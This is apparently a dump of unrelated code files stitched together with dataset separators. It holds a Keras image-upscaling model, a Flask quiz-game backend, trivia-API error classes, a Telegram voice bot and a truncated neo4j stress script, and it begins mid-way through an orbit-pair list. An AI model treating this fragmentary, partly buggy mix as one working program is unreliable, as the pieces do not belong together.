'R3C)8ND',
'6RH)2KG',
'48Z)5P9',
'41P)46G',
'4VL)8V9',
'5F8)CZK',
'Q1C)K84',
'CJL)X37',
'XQ7)GR8',
'846)429',
'5ZS)9G5',
'5BS)PMC',
'F42)419',
'47B)G4F',
'BJ7)8Y5',
'SYR)T1Y',
'CMZ)3FS',
'K7C)432',
'763)1BD',
'FBM)F83',
'MMV)WPB',
'RKK)D7R',
'HDD)6R4',
'GRQ)MRD',
'H3J)RPL',
'W4M)GQQ',
'RYB)5BG',
'5LK)VLB',
'NVJ)SW7',
'CBH)QXM',
'W2Z)NPS',
'Y8D)J4N',
'5QQ)5KF',
'KV5)17G',
'YKZ)6RH',
'SPH)WGN',
'5RD)VKZ',
'7KB)WCD',
'L53)R3C',
'C38)JG2',
'JPY)DHD',
'3ND)53B',
'HJG)B7R',
'GH4)GSJ',
'Y44)24S',
'Y81)3W8',
'4P1)3Q2',
'F9T)873',
'3GQ)8J2',
'Z39)MJL',
'GQQ)9X6',
'QSY)ZZX',
'HH4)JWV',
'6J6)8SL',
'H9R)Y1S',
'P8Z)SFQ',
'8JC)ZBP',
'M41)59Q',
'2MC)9YM',
'454)F4G',
'NBF)V18',
'H2P)PXB',
'7NZ)47M',
'TQ2)PJM',
'1BD)FMX',
'233)Y5C',
'5HF)SF3',
'J3Q)CST',
'8KL)JH8',
'84B)P96',
'2KS)3R8',
'8V2)C2F',
'5ZW)P6C',
'YBR)JTN',
'XQZ)YGJ',
'5X7)CNV',
'31X)7FF',
'8MH)D93',
'JBQ)G4M',
'YMK)TF7',
'279)QWK',
'KFD)YJJ',
'T2M)PGY',
'M8W)HZL',
'31K)VLH',
'RGB)VTV',
'TLC)RR7',
'JTR)XCD',
'BLT)CP9',
'R6N)4WS',
'HCP)Z39',
'Q26)HCP',
'8V9)G4S',
'1H6)X96',
'D7R)TFC',
'WKM)LBB',
'WHJ)MGR',
'JPD)KST',
'5KF)C46',
'W1J)XJ8',
'JHP)NDJ',
'P6C)BX2',
'NFF)QBS',
'P9K)KWF',
'YS9)W7Z',
'GTY)CT5',
'QRN)6JG',
'RR7)NFQ',
'Q2Y)WKM',
'5D7)1BG',
'JCH)ZCK',
'NFQ)D3N',
'N8T)FP7',
'JRM)763',
'2B6)453',
'71V)4P1',
'CNW)513',
'8X2)HH4',
'QTQ)G6V',
'KPY)RBH',
'VKZ)CNL',
'4YM)QZB',
'SHJ)ZS3',
'HGT)HZ8',
'K9Z)2V6',
'41V)H2S',
'TP3)6Q6',
'MVG)WV6',
'1F6)Y49',
'W31)4HF',
'KKQ)BJ7',
'TRT)HJG',
'QXM)TJD',
'JV4)34K',
'DZ2)B24',
'MGR)QKG',
'KN7)XBD',
'BXL)KKL',
'TG5)YWH',
'ZJP)RBQ',
'R4V)T2M',
'DR3)N8P',
'KL6)R4G',
'K7T)VMK',
'3J1)G8D',
'RMV)443',
'451)PR2',
'4D3)Z6W',
'TY3)75X',
'J2D)3YJ',
'WDS)3X2',
'PG8)271',
'S1N)YCX',
'M95)CCM',
'NJ9)Y92',
'VTV)6K2',
'KNM)9JN',
'82P)RTT',
'8J7)31D',
'4J9)MP8',
'4RS)89Z',
'RDK)DPY',
'745)RTP',
'XM7)NPP',
'QLV)4H2',
'VQZ)BWP',
'9DR)XTY',
'Y92)819',
'FTK)NQT',
'67Q)NGB',
'8VF)TL3',
'9TY)KW2',
'NW1)LCP',
'VLH)W2L',
'BXJ)22J',
'CCM)XPT',
'VRH)R84',
'6MW)X7L',
'3L5)MT6',
'2C6)Z2D',
'LWK)4FY',
'RVP)SS6',
'8XN)TL6',
'FSR)5MY',
'NKC)51L',
'M42)RQH',
'SJ2)BMR',
'ZS3)L66',
'KMG)5MG',
'SPH)DR3',
'D6T)2LX',
'JT2)H4M',
'8TR)VW3',
'ZTY)4XR',
'QXZ)8X2',
'VHX)DNK',
'7JR)338',
'P9C)ZQV',
'QJX)2MC',
'79J)1ZJ',
'5M2)9B7',
'QX2)TP3',
'14N)JM4',
'GZV)6LR',
'KKL)XM5',
'THZ)FD6',
'7QS)H2P',
'9H6)VLJ',
'WZR)3QC',
'S97)31X',
'5C1)LNW',
'WYN)SVM',
'4X2)C57',
'4GQ)D6T',
'XN8)QSY',
'26Z)QW6',
'X8G)62K',
'XHS)L33',
'KTY)F65',
'LXT)F9Q',
'CP9)NCZ',
'YCX)WBW',
'NFQ)4X4',
'CCM)X27',
'TWB)91G',
'MFG)KH2',
'VKN)3XV',
'XBV)SJ2',
'P8J)V7V',
'P3P)CPS',
'G7B)8NZ',
'FCH)KQP',
'ZCK)HK8',
'FQV)6QJ',
'F8X)4XK',
'8SQ)3GQ',
'2HZ)K5V',
'JWR)F3L',
'GYD)LZL',
'VSG)T14',
'34K)PTX',
'4WS)VCK',
'H89)RG4',
'S1T)Q56',
'XX2)Z5T',
'H5P)LCG',
'PQ7)RRT',
'CNV)YGQ',
'6DY)M13',
'F16)6TJ',
'HB3)QL7',
'LB9)KKQ',
'HPL)XN8',
'XPX)6Q1',
'2Y7)3QD',
'MLK)4KW',
'GFZ)WSK',
'8SN)GR6',
'6TM)4D3',
'3FV)G5Y',
'PNZ)QK1',
'ZMG)882',
'MJK)9X3',
'QTM)FQV',
'453)N5V',
'P54)MVB',
'MTZ)9VX',
'KV3)SHJ',
'HZ8)MY9',
'4FY)959',
'C48)M42',
'882)9DR',
'55M)NL3',
'CWM)51X',
'QGY)FRF',
'XQZ)Y14',
'X3F)BKR',
'JKS)8G6',
'6KB)FVW',
'2R8)KTY',
'PXB)M9T',
'QH9)6S4',
'YX6)VKC',
'KS5)LKT',
'HK3)4GY',
'97X)9XQ',
'ZP3)NFY',
'HH4)JC6',
'31K)PX8',
'19Q)W3Z',
'763)GFZ',
'DYY)BXL',
'RZ3)5M6',
'L38)Y2L',
'QYS)93J',
'QHC)TB5',
'QLH)V1B',
'D43)YDS',
'JM4)1J9',
'Z4L)Z6F',
'D93)68C',
'1RW)8TK',
'7YV)K7L',
'JD4)RD5',
'5Y4)L97',
'TP3)Q9W',
'SKQ)DQD',
'X4M)VRH',
'CTN)MMM',
'DB7)QP8',
'VG2)1F9',
'LK7)LS4',
'RZ7)4FH',
'LHK)K9Z',
'7B6)3HB',
'659)6ZY',
'1CZ)9W9',
'NPD)PNZ',
'WRG)Q57',
'H5Q)BTD',
'MZB)QN3',
'S7H)NS9',
'6QF)2Y7',
'C51)HG3',
'5RG)QTQ',
'7SW)LB9',
'NRK)CJL',
'D15)F48',
'KBT)5N1',
'YQT)MZX',
'GJ8)J7R',
'4Z1)S5G',
'2QD)5DV',
'4XK)DCC',
'23G)YNX',
'1CN)H3J',
'DX7)8WD',
'COM)DLS',
'5P9)8YK',
'GFB)DB7',
'1LL)S8D',
'BXK)H3C',
'HCW)FHZ',
'2N8)C4F',
'7BH)VGX',
'8VX)CLB',
'H2H)YTM',
'S5G)FFJ',
'122)1BY',
'MY9)1TR',
'1TR)WXH',
'M3P)XZM',
'BJG)C6V',
'L97)QCM',
'FFJ)SVJ',
'KQP)945',
'TR7)RDK',
'S4K)3Y7',
'GBG)TC5',
'8Y5)TY9',
'7S3)KJK',
'K6W)S5N',
'J3X)TNR',
'98Q)DDY',
'DFD)2QD',
'QSZ)43S',
'BRZ)PN4',
'N5P)LLD',
'62Y)S1N',
'TQW)W27',
'X27)9FX',
'DQ3)W1J',
'WJ1)8BZ',
'4Y8)L1C',
'92Q)HVG',
'T64)J7F',
'RKK)S2J',
'8M4)GLD',
'RCJ)2N8',
'HQ6)3MV',
'L6D)C3V',
'71M)Q4M',
'TL2)SXJ',
'1NC)QYS',
'P48)1S7',
'TXW)GYB',
'FXC)W3X',
'85G)XQT',
'7CW)F5R',
'52X)298',
'Q4M)WLP',
'RG8)XQG',
'9W9)BVJ',
'TDV)4MF',
'NLP)N8T',
'W2L)1JC',
'QXD)L9N',
'KSK)ZPF',
'HM4)GJG',
'HVG)FQD',
'D1B)CK9',
'KFG)1H9',
'9DF)6J6',
'HHK)ML8',
'H3J)42L',
'TBQ)HJ8',
'6Q6)71V',
'VG2)PG8',
'KYC)YQV',
'Y93)T5H',
'RG4)RTX',
'814)NRC',
'VQ8)KMH',
'YNX)H5N',
'JM4)JHP',
'CSJ)DYJ',
'LY3)5RD',
'YW3)TDD',
'MHJ)GFQ',
'N11)CV7',
'TX7)GD8',
'ZQV)RMD',
'5NQ)8V2',
'XTY)2BY',
'BXL)1JM',
'FK4)7TY',
'XQG)P31',
'XBX)7KP',
'LYY)T77',
'71H)P9K',
'D6D)L21',
'TFM)BYP',
'L93)YM4',
'BQZ)NLW',
'2XV)4F1',
'K7L)VSG',
'CL9)C51',
'H9T)LGC',
'XDM)Y17',
'VV1)3FK',
'6RQ)JTR',
'1ZK)SGL',
'ZKH)X9R',
'SGK)Y7D',
'NQT)C3C',
'3XV)G7B',
'9D3)48Z',
'5LJ)ZP7',
'SB3)GY1',
'1MZ)H9T',
'NXF)MB3',
'Y7M)6H3',
'WZ8)SNF',
'MN9)N5X',
'3VW)ZMG',
'HKG)GRY',
'3X2)6QF',
'N87)6QS',
'QLT)3H2',
'DKN)ZTT',
'6PF)2N4',
'JSP)21F',
'298)MN9',
'J9G)HQ3',
'YPC)ML6',
'9JN)BT3',
'HJ8)BQZ',
'8W1)H4F',
'FTK)58B',
'DW5)39H',
'KDC)MH7',
'L7R)G1G',
'FGS)RBB',
'4S1)YN8',
'NS2)FK4',
'683)JSW',
'PZN)R4M',
'YX5)VL5',
'BKR)NDV',
'S26)NWQ',
'P4D)7BC',
'8V6)2B6',
'3WY)KV3',
'41S)J34',
'MJL)71F',
'L8T)8J7',
'DPZ)W6W',
'SD7)R39',
'DVP)X1L',
'KPC)ZK8',
'4H2)PRP',
'6H3)XDQ',
'TFC)8YD',
'JC6)GKL',
'W6F)ZD8',
'111)G75',
'9Q1)451',
'XCL)XYN',
'B5L)TDK',
'FRF)47Q',
'XJ8)Y8X',
'BKM)FWK',
'5HD)F87',
'51X)LK7',
'1BY)Z17',
'GSJ)1NC',
'WDX)KTL',
'7L9)41V',
'C11)3MQ',
'2FV)Y9G',
'L34)35W',
'N9C)HQ6',
'GR8)DYB',
'YDS)KS5',
'S82)CWM',
'XBD)STY',
'NQJ)XZT',
'MK1)LBP',
'YPY)S7G',
'3JX)PZN',
'BSF)RCJ',
'KQD)J2C',
'RPL)1Q3',
'WXH)J3Q',
'75D)1XF',
'6J6)6GM',
'Z17)XDS',
'3HB)FCH',
'Y49)H3V',
'P6C)2X7',
'Q35)GH1',
'MY2)JWR',
'2DD)41S',
'V1B)GJ1',
'YK2)KQD',
'9B7)7SW',
'VFQ)PR7',
'6HQ)J2D',
'P7S)Y44',
'F4G)YDW',
'1S7)XX2',
'S5N)WV9',
'D3N)X4K',
'QFD)5JG',
'6VB)7P1',
'Y14)PP3',
'L2Y)LHK',
'V5Q)H5P',
'L4M)9Q1',
'MC6)BFQ',
'14Y)Y5Y',
'QDK)CQ4',
'CHG)7KR',
'LFR)F6V',
'L76)RYB',
'M7J)1Z9',
'QQD)6FT',
'J2F)K6W',
'GP1)VGF',
'H36)P6P',
'YQX)Z5Z',
'SS6)6WG',
'16K)Q35',
'NFG)XM7',
'6KF)M7Q',
'R8L)FVD',
'M7Q)VWZ',
'6WG)N1C',
'3XT)858',
'F2R)K8V',
'T4Y)5X7',
'KP1)XRR',
'NCV)HWY',
'PNN)14N',
'W9G)CZ7',
'2LD)9DF',
'7ZY)PCK',
'1J9)HX2',
'6GM)7XP',
'DLS)NM3',
'DX9)H8P',
'T9C)TRT',
'SL8)2XV',
'CCJ)5BH',
'7FF)TQW',
'PR7)SB3',
'NGB)MMV',
'4S1)N9T',
'DYB)911',
'JBQ)R4P',
'N5V)GK5',
'9LV)KNM',
'YHR)23S',
'TS9)ZKH',
'1KF)Q4H',
'LYL)STW',
'SNM)WZ8',
'8X2)WJ1',
'HLT)8SQ',
'WF8)119',
'LGC)6GY',
'WVW)XGG',
'YD8)2FV',
'THM)WYK',
'PRH)FTZ',
'6Y7)8BB',
'8BZ)R4V',
'FH1)YQF',
'KST)L4M',
'L91)QCC',
'CCX)VYZ',
'YQT)QLT',
'S8D)NR6',
'Y72)HSZ',
'87W)RVP',
'DLQ)1FT',
'2TZ)9TY',
'2KB)YBR',
'K5V)VBJ',
'ZVK)RFY',
'ML6)DLV',
'PS2)23V',
'6MX)WYD',
'5FV)8RK',
'5D7)8VX',
'NWQ)62M',
'QK1)8ZN',
'S7J)K53',
'451)LW1',
], 'YOU', 'SAN'))
``` |
{
"source": "1pkg/neura",
"score": 3
} |
#### File: source/models/convolution_scaled.py
```python
from keras.models import Sequential
from keras.optimizers import Adam
from keras.layers import Conv2D
from .base_scaled import BaseScaled
from .loss_func import psnr_loss
class ConvolutionScaled(BaseScaled):
def _model(self):
model = Sequential()
model.add(
Conv2D(
64,
9,
padding='same',
activation='relu',
input_shape=(640, 360, 3),
))
model.add(
Conv2D(
32,
1,
padding='same',
activation='relu',
input_shape=(640, 360, 64),
))
model.add(
Conv2D(
3,
5,
padding='same',
activation='relu',
input_shape=(640, 360, 32),
))
model.compile(
optimizer=Adam(lr=1e-3),
loss='mse',
metrics=[psnr_loss],
)
return model
```
#### File: source/utils/keeper.py
```python
from os import path, makedirs
from shutil import rmtree
from PIL import Image
import numpy
class Keeper:
def __init__(self, bundle, model):
path_base = path.join(
path.dirname(__file__),
'..',
'..',
'dump',
)
self.__path_result = path.join(path_base, 'result', bundle, model)
if path.exists(self.__path_result):
rmtree(self.__path_result)
def save(self, file_name, data_src, data_mod, data_res):
path_res = path.join(self.__path_result, file_name)
if path.exists(path_res):
rmtree(path_res)
makedirs(path_res)
data_src *= 255
image = Image.fromarray(numpy.uint8(data_src))
image = image.convert('RGB')
file_name = path.join(path_res, 'src.jpeg')
image.save(file_name, 'JPEG')
data_mod *= 255
image = Image.fromarray(numpy.uint8(data_mod))
image = image.convert('RGB')
file_name = path.join(path_res, 'mod.jpeg')
image.save(file_name, 'JPEG')
data_res *= 255
image = Image.fromarray(numpy.uint8(data_res))
image = image.convert('RGB')
file_name = path.join(path_res, 'res.jpeg')
image.save(file_name, 'JPEG')
```
#### File: source/utils/plotter.py
```python
from matplotlib import pyplot
class Plotter:
def __init__(self, bundle, model):
self.__bundle = bundle
self.__model = model
def show(self, history):
if history is None:
return
pyplot.plot(history['loss'])
pyplot.title(f'model {self.__model} with bundle {self.__bundle} mse')
pyplot.ylabel('mse')
pyplot.xlabel('epoch')
pyplot.show()
pyplot.plot(history['psnr_loss'])
pyplot.title(f'model {self.__model} with bundle {self.__bundle} psnr')
pyplot.ylabel('psnr')
pyplot.xlabel('epoch')
pyplot.show()
``` |
{
"source": "1pkg/ReRe",
"score": 2
} |
#### File: source/actions/devote.py
```python
from json import loads
from base import Constant
from models import Effect, Setting
from .mixins import Crypto
class Devote(Crypto):
CACHE_EXPIRE = Constant.DEFAULT_CACHE_EXPIRE
def _process(self, request):
shaders = [{
'name': effect.name,
'code': loads(effect.shader),
'uniform': loads(effect.uniform),
} for effect in Effect.query]
setting = {
Setting.NAME_CHOSE_PERIOD:
Setting.get(Setting.NAME_CHOSE_PERIOD),
}
return {
'shaders': shaders,
'settings': setting,
}
```
#### File: source/actions/handshake.py
```python
from base import Action, Constant
from errors import Integrity, Overwhelm, Request
from models import Account, Device, Session
class Handshake(Action):
def _validate(self, request):
super()._validate(request)
validator = self._application.validator
datetime = self._application.datetime
http = self._application.http
settings = self._application.settings
self.__account_alias = self._get(request, 'alias')
self.__account_uuid = self._get(request, 'uuid', '')
self.__user_digest = self._get(request, 'digest')
self.__user_device = self._get(request, 'device')
self.__user_agent = http.useragent(request)
self.__user_ip = http.userip(request)
self.__integrity = self._get(request, 'integrity', '')
if not self.__integrity == settings[Constant.SETTING_INTEGRITY]:
raise Integrity()
if validator.isempty(self.__account_alias):
raise Request('alias', self.__account_alias)
if len(self.__account_uuid) != Constant.NORMAL_HASH_SIZE or \
not validator.ishex(self.__account_uuid):
raise Request('uuid', self.__account_uuid)
if validator.isempty(self.__user_digest):
raise Request('digest', self.__user_digest)
if not self.__user_device in Device.__members__:
raise Request('device', self.__user_device)
if validator.isempty(self.__user_agent):
raise Request('user_agent', self.__user_agent)
if validator.isempty(self.__user_ip):
raise Request('user_ip', self.__user_ip)
self.__account = Account.query \
.filter(Account.uuid == self.__account_uuid) \
.first()
if self.__account is not None and \
Session.query \
.filter(Session.account_id == self.__account.id) \
.filter(Session.time_stamp >= datetime.date(-Constant.DAY_COUNT_SINGLE)) \
.count() > settings[Constant.SETTING_SESSION_DAILY_LIMIT]:
raise Overwhelm(self.__account.id)
def _process(self, request):
db = self._application.db
storage = self._application.storage
datetime = self._application.datetime
c_hash = self._application.hash
random = self._application.random
settings = self._application.settings
gift_threshold = settings[Constant.SETTING_FREEBIE_GIFT_THRESHOLD]
freebie_unit = settings[Constant.SETTING_SHARE_FREEBIE_UNIT]
if self.__account is None:
self.__account = Account(
alias=self.__account_alias,
uuid=self.__account_uuid,
)
db.session.add(self.__account)
elif (len(self.__account.sessions) % gift_threshold) == 0:
self.__account.freebie += freebie_unit
storage.push(
self.__account.uuid,
f'''
Thank you for keeping using our service
We're glad to present you little bonus
{freebie_unit} freebie for you
''',
)
else:
storage.delete(self.__account.uuid)
alias = self.__account.alias
token = c_hash.hex(
c_hash.NORMAL_DIGEST,
datetime.timestamp(),
random.salt(),
self.__user_digest,
self.__user_device,
self.__user_agent,
self.__user_ip,
self.__integrity,
)
session = Session(
user_device=Device[self.__user_device],
user_digest=self.__user_digest,
user_agent=self.__user_agent,
user_ip=self.__user_ip,
token=token,
)
session.account = self.__account
db.session.commit()
return {
'alias': alias,
'token': token,
}
```
#### File: source/actions/mark.py
```python
from base import Constant
from errors import Request
from models import Mark as _Mark_, Type
from .mixins import Identify
class Mark(Identify):
CONNECTION_LIMIT = Constant.RIGID_CONNECTION_LIMIT
def _validate(self, request):
super()._validate(request)
self.__type = self._get(request, 'type', '')
if not self.__type in Type.__members__:
raise Request('type', self.__type)
self.__type = Type[self.__type]
def _process(self, request):
db = self._application.db
mark = _Mark_.query \
.filter(_Mark_.type == self.__type) \
.filter(_Mark_.task_id == self._task.id) \
.filter(_Mark_.session_id == self._session.id) \
.first()
if mark is None:
mark = _Mark_(type=self.__type)
mark.task = self._task
mark.session = self._session
db.session.commit()
```
#### File: actions/mixins/registration.py
```python
from base import Constant
from .access import Access
class Registration(Access):
def _registrate(self, task, answered):
storage = self._application.storage
datetime = self._application.datetime
settings = self._application.settings
identity = {
'task_id': task.id,
'answered': int(answered),
'token': self._session.token,
'timestamp': datetime.timestamp(),
}
storage.set(
self._session.token,
identity,
settings[Constant.SETTING_IDENTITY_TIMEOUT],
)
return task
```
#### File: source/actions/rating.py
```python
from base import Constant
from models import Account
from .mixins import Crypto
class Rating(Crypto):
CACHE_EXPIRE = Constant.DEFAULT_CACHE_EXPIRE
def _process(self, request):
db = self._application.db
settings = self._application.settings
admin = Account.query \
.filter(Account.alias == settings[Constant.SETTING_ADMIN_ALIAS]) \
.first()
accounts = Account.query \
.filter(Account.id != admin.id) \
.order_by(db.desc(Account.score)) \
.limit(settings[Constant.SETTING_RATING_TABLE_SIZE]).all()
return [
{'alias': account.alias, 'score': account.score}
for account in accounts
]
```
#### File: source/actions/share.py
```python
from base import Constant
from errors import Request
from models import Share as _Share_, Media
from .mixins import Access
class Share(Access):
CONNECTION_LIMIT = Constant.RIGID_CONNECTION_LIMIT
def _validate(self, request):
super()._validate(request)
self.__media = self._get(request, 'media', '')
if not self.__media in Media.__members__:
raise Request('media', self.__media)
self.__media = Media[self.__media]
def _process(self, request):
db = self._application.db
storage = self._application.storage
settings = self._application.settings
freebie_unit = settings[Constant.SETTING_SHARE_FREEBIE_UNIT]
if _Share_.query \
.filter(_Share_.media == self.__media) \
.filter(_Share_.session_id == self._session.id) \
.first() is None:
self._session.account.freebie += freebie_unit
storage.push(
self._session.account.uuid,
f'''
Thank you for sharing our service
We're glad to present you little bonus
{freebie_unit} freebie for you
''',
)
share = _Share_(media=self.__media)
share.session = self._session
db.session.commit()
```
#### File: source/actions/splash.py
```python
from base import Constant
from models import Answer, Subject, Task
from .mixins import Crypto
class Splash(Crypto):
WILDCARD_ENDPOINT = True
CACHE_EXPIRE = Constant.DEFAULT_CACHE_EXPIRE
def _process(self, request):
db = self._application.db
datetime = self._application.datetime
device = self._session.user_device
task = Task.query \
.join(Subject, db.and_(
Subject.id == Task.subject_id,
Subject.orientation == device.orientation()
)) \
.join(Answer, db.and_(
Answer.task_id == Task.id,
Answer.time_stamp >= datetime.date(-Constant.DAY_COUNT_WEEK),
)) \
.group_by(Task.id) \
.order_by(
db.desc(db.func.count(Answer.id)),
db.func.random(),
).first()
if task is not None:
subject = {
'link': task.subject.link,
'orientation': str(task.subject.orientation),
}
effects = [{
'name': effect.name,
} for effect in task.effects]
return {
'subject': subject,
'effects': effects,
}
```
#### File: source/base/action.py
```python
from .constant import Constant
class Action:
WILDCARD_ENDPOINT = False
CACHE_EXPIRE = None
CONNECTION_LIMIT = Constant.RAREFIED_CONNECTION_LIMIT
def __init__(self, application):
self._application = application
def __call__(self, request):
self._validate(request)
data = self._process(request)
return self._format(data)
def _validate(self, request):
pass
def _process(self, request):
return NotImplemented
def _format(self, response=None):
return response
def _get(self, request, key, default=None):
if (request.json is not None and key in request.json):
return str(request.json[key])
return default
```
#### File: source/commands/sync_settings.py
```python
from os import path
from json import load
from base import Command
from models import Setting
class SyncSettings(Command):
NAME = 'sync-settings'
DESCRIPTION = 'Sync vcs settings with database.'
def execute(self):
settings = []
vsc_settings = self.__readsync()
with self._application.instance.app_context():
for setting in Setting.query:
if setting.name not in vsc_settings:
self._application.db.session.delete(setting)
else:
vsc_setting = vsc_settings[setting.name]
setting.value = vsc_setting['value']
for _, vsc_setting in vsc_settings.items():
if Setting.query \
.filter(Setting.name == vsc_setting['name'])\
.first() is None:
setting = Setting(
name=vsc_setting['name'],
value=vsc_setting['value'],
)
settings.append(setting)
self._application.db.session.add_all(settings)
self._application.db.session.commit()
def __readsync(self):
settings = {}
file = path.join(
path.dirname(__file__),
'..',
'..',
'settings',
'setting.json',
)
with open(file) as data:
for setting in load(data):
settings[setting['name']] = {
'name': setting['name'],
'value': str(setting['value']),
}
return settings
```
#### File: source/models/subject.py
```python
from enum import Enum
from base import Alchemy
class Orientation(Enum):
portrait = 'portrait'
landscape = 'landscape'
def __str__(self):
return str(self.value)
class Subject(Alchemy.Model):
__tablename__ = 'subject'
id = Alchemy.Column(
Alchemy.Integer,
nullable=False,
primary_key=True,
)
link = Alchemy.Column(
Alchemy.String,
nullable=False,
unique=True,
)
source = Alchemy.Column(
Alchemy.String,
nullable=False,
)
orientation = Alchemy.Column(
Alchemy.Enum(Orientation),
nullable=False,
index=True,
)
option_id = Alchemy.Column(
Alchemy.Integer,
Alchemy.ForeignKey('option.id', ondelete='cascade'),
nullable=False,
index=True,
)
tasks = Alchemy.relationship(
'Task',
backref='subject',
passive_deletes=True,
)
```
#### File: testing/cases/fetch_case.py
```python
from .base_case import BaseCase
from actions import Fetch
class FetchCase(BaseCase):
def test_fetch_result(self):
return NotImplemented
```
#### File: testing/cases/mark_case.py
```python
from .base_case import BaseCase
from actions import Mark
class MarkCase(BaseCase):
def test_bad_type(self):
return NotImplemented
def test_mark_result(self):
return NotImplemented
```
#### File: testing/cases/rating_case.py
```python
from .base_case import BaseCase
from actions import Rating
class RatingCase(BaseCase):
def test_rating_result(self):
return NotImplemented
```
#### File: source/base/formatter.py
```python
from re import sub
from logging import Formatter
class Formatter(Formatter):
BASE_FORMAT = '%(asctime)s %(levelname)s %(name)s: %(message)s'
TIME_FORMAT = '%Y-%m-%d %H:%M:%S'
def format(self, record):
record.msg = sub('\s+', ' ', record.msg).strip()
return super().format(record)
```
#### File: source/keepers/json.py
```python
from json import dump
from base import Keeper
class Json(Keeper):
def __init__(self, file_name):
self.__file_name = file_name
def write(self, items):
with open(self.__file_name, 'w') as file:
dump(items, file, indent=4)
```
#### File: source/targets/listal.py
```python
from math import ceil
from re import search, IGNORECASE
from random import shuffle
from bs4 import BeautifulSoup
from base import Target
from fetchers import Tor
class Listal(Target):
MAIN_URL = 'http://www.listal.com/characters/most-rated/'
PAGE_SIZE = 45
DEFAULT_LIMIT = 2100
def __init__(self, image, wiki, logger, keepers, limit):
super().__init__(image, wiki, logger, keepers, limit)
self._fetcher = Tor(logger)
def _get_items(self):
items = []
for page in range(0, ceil(self._limit / self.PAGE_SIZE)):
query = f'{self.MAIN_URL}{page}'
response = self._dead_fetch(query)
response = BeautifulSoup(response.content, 'lxml')
for list_item in response.find_all('div', {'class': 'gridview'}):
information = list_item.find('a', {'class': 'image'})
url = information['href']
title = information['title'].strip()
items.append({
'url': url,
'title': title,
'category': 'Fictional Character',
})
shuffle(items)
return items[:self._limit]
def _from_target(self, url, title):
response = self._dead_fetch(url)
response = BeautifulSoup(response.content, 'lxml')
anchor = response.find('div', {'id': 'rightstuff'})
anchor = anchor.div.div
if anchor is not None:
description = anchor.text
return {
'name': title,
'description': description,
'link': url,
'source': 'listal',
}
return None
def _fix_option(self, option):
if option is None or \
option['name'] is None or \
option['name'] is '' or \
option['description'] is None or \
option['description'] is '':
return None
if option['source'] == 'listal' and \
search('duplicate', option['description'], IGNORECASE):
self._logger.warning('target skipping duplicateted')
return None
if search('(anime)|(manga)', option['description'], IGNORECASE):
self._logger.warning('target skipping (anime)|(manga)')
return None
if search('game character', option['description'], IGNORECASE):
self._logger.warning('target skipping game character')
return None
return super()._fix_option(option)
```
#### File: source/targets/paganwikiadeities.py
```python
from random import shuffle
from bs4 import BeautifulSoup
from base import Target
from fetchers import Tor
class PaganWikiaDeities(Target):
MAIN_URL = 'http://pagan.wikia.com/wiki/List_of_Deities'
DEFAULT_LIMIT = None
def __init__(self, image, wiki, logger, keepers, limit):
super().__init__(image, wiki, logger, keepers, limit)
self._fetcher = Tor(logger)
def _get_items(self):
items = []
response = self._dead_fetch(self.MAIN_URL)
response = BeautifulSoup(response.content, 'lxml')
article = response.find('div', {'id': 'WikiaArticle'})
for list_item in article.find_all('li'):
anchors = list_item.find_all('a')
if not len(anchors) == 0:
title = anchors[0].string.strip()
items.append({
'url': None,
'title': title,
'category': 'Deity',
})
shuffle(items)
return items[:self._limit]
def _from_target(self, url, title):
return None
``` |
{
"source": "1Prototype1/aiopentdb",
"score": 3
} |
#### File: aiopentdb/aiopentdb/errors.py
```python
__all__ = ('OpenTDBError', 'NoResults', 'InvalidParameter', 'TokenNotFound', 'TokenEmpty')
class OpenTDBError(Exception):
"""Base error class for all OpenTDB related errors."""
class NoResults(OpenTDBError):
"""Error raised when the API could not return any result.
This error is a subclass of :class:`.OpenTDBError`.
"""
def __init__(self):
super().__init__('could not return results')
class InvalidParameter(OpenTDBError):
"""Error raised when the arguments passed during an API call are invalid.
This error is a subclass of :class:`.OpenTDBError`.
"""
def __init__(self):
super().__init__('arguments passed in are not valid')
class TokenNotFound(OpenTDBError):
"""Error raised when a session token is not found.
This error is a subclass of :class:`.OpenTDBError`.
"""
def __init__(self):
super().__init__('session token does not exist')
class TokenEmpty(OpenTDBError):
"""Error raised when a session token is empty.
This error is a subclass of :class:`.OpenTDBError`.
"""
def __init__(self):
super().__init__('session token has returned all possible questions')
``` |
{
"source": "1-punchMan/models",
"score": 2
} |
#### File: transformer/utils/others.py
```python
import importlib.util, sys
def from_path_import(name, path, globals, demands=[]):
spec = importlib.util.spec_from_file_location(name, path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
sys.modules[name] = module
for demand in demands:
globals[demand] = getattr(module, demand)
``` |
{
"source": "1push/telegram-fargusbot",
"score": 2
} |
#### File: 1push/telegram-fargusbot/bot.py
```python
import os
import logging
from uuid import uuid4
from telegram import InlineQueryResultVoice
from telegram.ext import Updater, InlineQueryHandler, CommandHandler
# Enable logging
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.WARNING)
logger = logging.getLogger(__name__)
# Get a new dictionary on every launch
file = open("dict.csv","r")
next(file)
data = {}
for line in file:
item = line.split(',')
data[item[0]] = item[1]
def get_audio_names(query):
result = list(filter(lambda key: data[key].find(query) != -1, data.keys()))[:10]
return result, [data[key][:-1] for key in result]
# Define a few command handlers
def error(update, context):
logger.warning('Update "%s" caused error "%s"', update, context.error)
def start(update, context):
update.message.reply_text('черт фил ты пьешь эту гадость тебе не надо было это пить')
def help(update, context):
update.message.reply_text("""
...
""")
def inlinequery(update, context):
query = update.inline_query.query
audio_names, titles = get_audio_names(query)
results = [
InlineQueryResultVoice(id=str(uuid4()),
voice_url=f'https://raw.githubusercontent.com/tiulpin/tg-fargusbot/master/opus/{audio_name}.ogg',
title=title) for audio_name, title in zip(*get_audio_names(query))]
update.inline_query.answer(results)
def main():
updater = Updater(os.environ['TELEGRAM_TOKEN'], use_context=True)
dp = updater.dispatcher
dp.add_error_handler(error)
dp.add_handler(CommandHandler("start", start))
dp.add_handler(CommandHandler("help", help))
dp.add_handler(InlineQueryHandler(inlinequery))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
``` |
{
"source": "1pxone/neo4j-javascript-driver",
"score": 2
} |
#### File: neo4j-javascript-driver/testkit/stress.py
```python
import subprocess
import os
def run(args):
subprocess.run(
args, universal_newlines=True, stderr=subprocess.STDOUT, check=True)
def test_driver():
run(["gulp", "run-stress-tests-without-jasmine"])
def test_driver_lite():
return
if __name__ == "__main__":
os.environ['STRESS_TEST_MODE'] = 'fastest'
os.environ['RUNNING_TIME_IN_SECONDS'] = \
os.environ.get('TEST_NEO4J_STRESS_DURATION', 0)
